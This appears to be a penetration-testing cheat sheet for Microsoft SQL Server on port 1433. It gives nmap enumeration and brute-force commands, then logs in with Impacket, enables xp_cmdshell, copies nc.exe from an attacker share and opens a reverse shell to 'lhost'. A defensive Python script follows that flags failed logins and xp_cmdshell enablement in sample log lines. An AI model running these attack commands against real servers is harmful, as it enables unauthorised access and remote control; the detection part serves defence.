# MsSQL (Port 1433)

## Quick Intro <a href="#quick-intro" id="quick-intro"></a>

**Microsoft SQL Server** is a **relational database management system** (**RDBMS**).

It listens on TCP port 1433 by default.

## Nmap Scripts <a href="#nmap-scripts" id="nmap-scripts"></a>

```
nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip
```

## BruteForce <a href="#bruteforce" id="bruteforce"></a>

```
nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt $ip
```

## RCE with SQL Server <a href="#rce-with-sql-server" id="rce-with-sql-server"></a>

* We can use Impacket's `mssqlclient.py` to log in and execute commands

```
mssqlclient.py <domain>/<username>:<password>@$ip

mssqlclient.py bathry/admin:password@0.0.0.0
```

* Enabled code execution (`xp_cmdshell`)
* Copied the Nishang reverse shell to the current directory, set the local host and port in it, and started a hosting server

{% embed url="https://github.com/samratashok/nishang.git" %}

```
SQL> enable_xp_cmdshell

SQL> xp_cmdshell copy \\lhost\gabbar\nc.exe %temp%\nc.exe

SQL> xp_cmdshell %temp%\nc.exe -e cmd.exe lhost 4444
```
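From the defender's side, the steps above leave traces in the SQL Server ERRORLOG: every brute-force guess writes a `Login failed for user` line carrying the client address, and `enable_xp_cmdshell` writes a `Configuration option 'xp_cmdshell' changed from 0 to 1` line. The Python below is an added example, not part of this page or of Impacket, that flags both over constructed sample log lines; the sample log, the failure threshold and the watched option names are assumptions.

```python
import re
from collections import Counter

# Constructed sample ERRORLOG excerpt (not from a real host); message text follows
# the standard SQL Server error log format.
SAMPLE_ERRORLOG = """\
2024-01-10 09:14:02.11 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-10 09:14:02.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-01-10 09:14:02.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-01-10 09:14:02.61 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.5]
2024-01-10 09:14:02.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-01-10 09:20:15.02 Logon       Login failed for user 'reportsvc'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.20]
2024-01-10 09:31:40.44 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-10 09:31:40.45 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

LOGIN_FAILED_RE = re.compile(
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_CHANGE_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
# Options whose activation precedes xp_cmdshell abuse (assumed watch list).
WATCHED_OPTIONS = {"xp_cmdshell", "show advanced options"}


def failed_logins_by_client(log_text):
    """Count 'Login failed' lines per client address."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOGIN_FAILED_RE.search(line)
        if m:
            counts[m.group("client")] += 1
    return counts


def brute_force_sources(log_text, threshold=3):
    """Client addresses with at least `threshold` failed logins (threshold is assumed)."""
    return sorted(c for c, n in failed_logins_by_client(log_text).items() if n >= threshold)


def option_enable_events(log_text):
    """Watched options switched from 0 to a non-zero value, in log order."""
    events = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE_RE.search(line)
        if m and m.group("option") in WATCHED_OPTIONS and m.group("old") == "0" and m.group("new") != "0":
            events.append(m.group("option"))
    return events


if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_ERRORLOG))
    print("options enabled:", option_enable_events(SAMPLE_ERRORLOG))
```

Disabling `xp_cmdshell` again via `sp_configure` and alerting on these two log patterns covers both the brute-force and the command-execution stages shown above.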
